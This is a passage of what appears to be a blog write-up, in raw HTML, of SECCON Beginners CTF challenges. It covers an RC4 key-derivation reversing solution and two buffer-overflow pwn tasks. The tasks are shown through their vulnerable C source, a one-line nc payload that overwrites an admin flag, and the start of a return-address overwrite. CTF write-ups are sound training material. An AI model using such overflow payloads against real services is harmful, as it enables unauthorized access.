url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAAB3ElEQVQ4y51UW5KjMBDzYRLC28Y22GSq8p8w5P636ZUa2N2pmtpk9kNlQ+xuSS1iluVT1udTns9V1nXV9RPP9/tdHoqHPB6vsSyL3jFd14kPXnrbS1NXUgNtU0vXtdK0RCNlWb4Nk6ZR5muSKSe5zUFutw8Z8c6iAZt0QF03QP0WTAhBi8UxyhSspDlJ75x244GqqhSvCh1nzDA4iTEIV4tCzg/isO/7TmgH2f2oIKX5wcrgWQQSUaiFd38f+glMzqMEDCXCNxcGfdk0m2eUXZXVZni1rWxS7jjs4Jljb8jGeg+Zg8TgNsDPnPM+fQsFTrzr1AoqcFTlMDRYwt+ts6qOq+GPMWVI9iqdbAf4GOArm7AI/WWU2JzsW0SpA7hnrP68b8VcIfkjRxnDNpTesWOveTx8PKS+gnroSJcS/MZEJVEOJLDjvy5/OxReSsjhDKY6IEidIvxkA8oHgnfqGT1yGi/7JaNfGDJrKU/6deQ0YiAB+ygBzzF6mVMUfk0Whagm0mfFFjeuw55fqjIjLk2jV1bXyUtCgRGFPZjSihbfNGPxdg57XKAkDTb/EHSa++T2Sb4zkN+SI6hewSpDatf333Y9gv4KPGeK4qKxuFwucj6f/xun00mKopBfhXcL7QyA0GEAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3c44ed3c0ca02456a7f58b45e3025f9b/8ac56/image-20240615171633672.webp 240w,\n/static/3c44ed3c0ca02456a7f58b45e3025f9b/d3be9/image-20240615171633672.webp 480w,\n/static/3c44ed3c0ca02456a7f58b45e3025f9b/131f1/image-20240615171633672.webp 900w\"\n              sizes=\"(max-width: 900px) 100vw, 900px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/3c44ed3c0ca02456a7f58b45e3025f9b/8ff5a/image-20240615171633672.png 240w,\n/static/3c44ed3c0ca02456a7f58b45e3025f9b/e85cb/image-20240615171633672.png 480w,\n/static/3c44ed3c0ca02456a7f58b45e3025f9b/1cfc2/image-20240615171633672.png 900w\"\n            sizes=\"(max-width: 900px) 100vw, 900px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/3c44ed3c0ca02456a7f58b45e3025f9b/1cfc2/image-20240615171633672.png\"\n            alt=\"image-20240615171633672\"\n            title=\"image-20240615171633672\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>To obtain the flag, I first generated the key from the seed using the following code.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">_4010 <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token number\">0xa5</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xd2</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xbc</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x02</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xb2</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x7c</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x86</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x38</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x17</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xb1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x38</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xc6</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xe4</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x5c</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xa0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x9d</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x96</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xd1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xf0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x4b</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xa6</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xa6</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x5c</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x64</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xb7</span><span class=\"token punctuation\">]</span>\n_4030 <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token number\">0x43</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x55</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x44</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x17</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x46</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x14</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x17</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x1a</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x1d</span><span class=\"token punctuation\">]</span>\n\nk <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n<span class=\"token keyword\">while</span> <span class=\"token boolean\">True</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">if</span> k <span class=\"token operator\">>=</span> <span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>_4030<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">break</span>\n    _4030<span class=\"token punctuation\">[</span>k<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>k<span class=\"token operator\">+</span><span class=\"token number\">0x20</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">^</span> _4030<span class=\"token punctuation\">[</span>k<span class=\"token punctuation\">]</span>\n    k <span class=\"token operator\">+=</span> <span class=\"token number\">1</span>\n\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> _4030<span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>i<span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">2</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>end<span class=\"token operator\">=</span><span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Then, by performing RC4 decryption using the generated key and ciphertext, I obtained the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/2130b/image-20240615171046653.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 57.50000000000001%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABEElEQVQoz5WTi46DIBBF/f9fXDdq65OqFdBBEb0Fmm1227VVk5MhMDkMkzGoOwapODh1EB6OJIvwnYRgF4Z+6DHQ8AIp8qiRIKRAXmSI4ghB3ISoqcRlKB6wPkfOT2ivLQQX4Jz/QQiJcRzvqHtUNhIRgqrPUCsrpMKKCzR27WLZp1hWg6NfEDVfSLsYhTgj5TGSNkQuTijlGdpon7Su626C6lr6HtJke6UlhOqgZoKcOswfhP9WSLrHaJSFfJz8WsHtm8U8hLuf/O7wR3RIaIvffNKyLMd7+FzB76qc8Ijso/B5b3cPt4RSSjuwCsYYaK03cYNd17UdePFeyBhD27Y+0f0F8zy/4C5zwqqqfN4N4CqtFHtIk4kAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/8ac56/image-20240615171046653.webp 240w,\n/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/d3be9/image-20240615171046653.webp 480w,\n/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/e46b2/image-20240615171046653.webp 960w,\n/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/7bb49/image-20240615171046653.webp 1271w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/8ff5a/image-20240615171046653.png 240w,\n/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/e85cb/image-20240615171046653.png 480w,\n/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/d9199/image-20240615171046653.png 960w,\n/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/2130b/image-20240615171046653.png 1271w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/d9199/image-20240615171046653.png\"\n            alt=\"image-20240615171046653\"\n            title=\"image-20240615171046653\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>It was listed as Hard difficulty, but I was able to solve it at a glance, so my Rev skills may have improved a bit.</p>\n<h2 id=\"simpleoverflowpwn\" style=\"position:relative;\"><a href=\"#simpleoverflowpwn\" aria-label=\"simpleoverflowpwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>simpleoverflow(Pwn)</h2>\n<blockquote>\n<p>In C, 0 is treated as False and any other value as True.</p>\n</blockquote>\n<p>This was a super-easy challenge.</p>\n<p>The following source code is provided for the challenge binary.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span><span class=\"token number\">10</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token number\">0</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">int</span> is_admin <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"name:\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">read</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">,</span> <span class=\"token number\">0x10</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Hello, %s\\n\"</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span>is_admin<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"You are not admin. bye\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span> <span class=\"token keyword\">else</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">system</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/bin/cat ./flag.txt\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">__attribute__</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>constructor<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">void</span> <span class=\"token function\">init</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">alarm</span><span class=\"token punctuation\">(</span><span class=\"token number\">120</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Without needing any real analysis, I just sent the following payload to obtain the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token builtin class-name\">echo</span> -e <span class=\"token string\">'\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01'</span> <span class=\"token operator\">|</span> <span class=\"token function\">nc</span> simpleoverflow.beginners.seccon.games <span class=\"token number\">9000</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 872px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/dbd60843c29d84ecb6825a7779960a19/65654/image-20240616081357044.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 12.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAiElEQVQI16WNyw6CMBBFmwjC9LEwQKEtaCstuvH/P+86adQfcHFyHzPJFellsT0G+JuDu2Zs+5P9jpAO2PWOiw3wsSAwX53XhLhnpBQxTiN88ChHRikZwi0ORBLduWPtobWClFRp2wZNc6reGP3rlZKcTf0nos/doOcs7DzxyoBlmbkgCCH+4g0XCEYsykgQ2gAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/dbd60843c29d84ecb6825a7779960a19/8ac56/image-20240616081357044.webp 240w,\n/static/dbd60843c29d84ecb6825a7779960a19/d3be9/image-20240616081357044.webp 480w,\n/static/dbd60843c29d84ecb6825a7779960a19/a8a2c/image-20240616081357044.webp 872w\"\n              sizes=\"(max-width: 872px) 100vw, 872px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/dbd60843c29d84ecb6825a7779960a19/8ff5a/image-20240616081357044.png 240w,\n/static/dbd60843c29d84ecb6825a7779960a19/e85cb/image-20240616081357044.png 480w,\n/static/dbd60843c29d84ecb6825a7779960a19/65654/image-20240616081357044.png 872w\"\n            sizes=\"(max-width: 872px) 100vw, 872px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/dbd60843c29d84ecb6825a7779960a19/65654/image-20240616081357044.png\"\n            alt=\"image-20240616081357044\"\n            title=\"image-20240616081357044\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"simpleoverwritepwn\" style=\"position:relative;\"><a href=\"#simpleoverwritepwn\" aria-label=\"simpleoverwritepwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>simpleoverwrite(Pwn)</h2>\n<blockquote>\n<p>Let’s check the stack and return address.</p>\n</blockquote>\n<p>This was super-easy challenge #2.</p>\n<p>The following code is provided for the challenge binary.</p>\n<p>It’s clear that jumping to the win function will give us the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdint.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">win</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span><span class=\"token number\">100</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  FILE <span class=\"token operator\">*</span>f <span class=\"token operator\">=</span> <span class=\"token function\">fopen</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"./flag.txt\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"r\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">,</span> <span class=\"token number\">100</span><span class=\"token punctuation\">,</span> f<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span><span class=\"token number\">10</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token number\">0</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"input:\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">read</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">,</span> <span class=\"token number\">0x20</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Hello, %s\\n\"</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"return to: 0x%lx\\n\"</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token class-name\">uint64_t</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>buf<span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">18</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">__attribute__</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>constructor<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">void</span> <span class=\"token function\">init</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">alarm</span><span class=\"token punctuation\">(</span><span class=\"token number\">120</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Looking at the protections, there’s nothing other than NX, so a simple buffer overflow to reach the win function should work.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 814px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b130df030f34edc06c1cc1d707dfdd00/a4262/image-20240616081623373.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 17.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAoUlEQVQY042MzQ6CMBCEy29BMSEYESgipdA2RC++/7uNS3uQxIMevszOzGaYfrW4rxeIscO4PHAnhnnFbdKY7JPUQGrKlKXO55sOSsNYAyE61HWN6lw5mJpmJBGHmXuYpYeSV6y2R3E8gKcJOE+9EnmeOc0oS13HEUYhGGMf5DS6ozkxCKIlmpwh3D/9IAh2vixLP0gjovDIzf8xFMfxV/YG45tcJmArBgwAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b130df030f34edc06c1cc1d707dfdd00/8ac56/image-20240616081623373.webp 240w,\n/static/b130df030f34edc06c1cc1d707dfdd00/d3be9/image-20240616081623373.webp 480w,\n/static/b130df030f34edc06c1cc1d707dfdd00/f23e7/image-20240616081623373.webp 814w\"\n              sizes=\"(max-width: 814px) 100vw, 814px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b130df030f34edc06c1cc1d707dfdd00/8ff5a/image-20240616081623373.png 240w,\n/static/b130df030f34edc06c1cc1d707dfdd00/e85cb/image-20240616081623373.png 480w,\n/static/b130df030f34edc06c1cc1d707dfdd00/a4262/image-20240616081623373.png 814w\"\n            sizes=\"(max-width: 814px) 100vw, 814px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b130df030f34edc06c1cc1d707dfdd00/a4262/image-20240616081623373.png\"\n            alt=\"image-20240616081623373\"\n            title=\"image-20240616081623373\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I’ll just use radare2 to verify the address of the win function and the offset of the buffer in the main function.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 522px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/27cc26307230cc36e8e740399e268f80/29492/image-20240616082009105.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 73.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACBklEQVQ4y4WT13KCYBSEbeAoFkTsBRXBXqNg3v/BNmcPERMTk4t/EGU+tplZ+yZOaxMr30DgZeA2DPT6AxQKeWQyGeTzeflcQC6XSw+//3qy2ezjPo7PuL1fEEUnuG4DpmmgVqvpj9VqBfO5D88bY7lawPdnWCwX8n31BzQ91+iKKI7Aq+M4oqgAy7JS4FIA09kUm+1a4fv9DsPh4DXwcn0T2AW8Ok1HLVpWOQWGYYDJxBOFS1W63qxQKpVeA6P4ivgWKdRxGjCMAioCSoBVsRhi5lPhRpROcDwd0Gq3/laoJ3ooLJcThVbFUuDYG2mGavmwQyCqWdTvGT4p5IOVSpJhp9OBL5DVeqlAWnVbrrr4UyFtH457NBq2tGxKy0mLDJ/5BeFcs6P10XiEwaCPbreDvlyZK4V8afmi6nb7rQBlNkUznc0dNhbIPEjsUikPQafzUSOxbfuxxTuQCpkhLd9nwxeEi0AyHOshaLvbKKgtxfR6Xdjiip+Z/bdSqDDZoZTyOZuW5MUChqMhptOJbpEvazabv/5jvs2Gb2V2hmFou/zRE8tslsMOF6GCXpbxPBvu63k29XpdsptrXgQzKxbH57hR2uUz3G29XnsovL3HGjjLoEICaYlWGTptc0r2J4xREO66Tb3nlNKm3y5n8NAy31YsFlG9z0aA3CELaXfaOpP/LH8Aaw1zMmcFbIIAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/27cc26307230cc36e8e740399e268f80/8ac56/image-20240616082009105.webp 240w,\n/static/27cc26307230cc36e8e740399e268f80/d3be9/image-20240616082009105.webp 480w,\n/static/27cc26307230cc36e8e740399e268f80/25feb/image-20240616082009105.webp 522w\"\n              sizes=\"(max-width: 522px) 100vw, 522px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/27cc26307230cc36e8e740399e268f80/8ff5a/image-20240616082009105.png 240w,\n/static/27cc26307230cc36e8e740399e268f80/e85cb/image-20240616082009105.png 480w,\n/static/27cc26307230cc36e8e740399e268f80/29492/image-20240616082009105.png 522w\"\n            sizes=\"(max-width: 522px) 100vw, 522px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/27cc26307230cc36e8e740399e268f80/29492/image-20240616082009105.png\"\n            alt=\"image-20240616082009105\"\n            title=\"image-20240616082009105\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9278bf02aa97f8a5d0fcf72b29200404/9239a/image-20240616082132183.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 60%; position: relative; 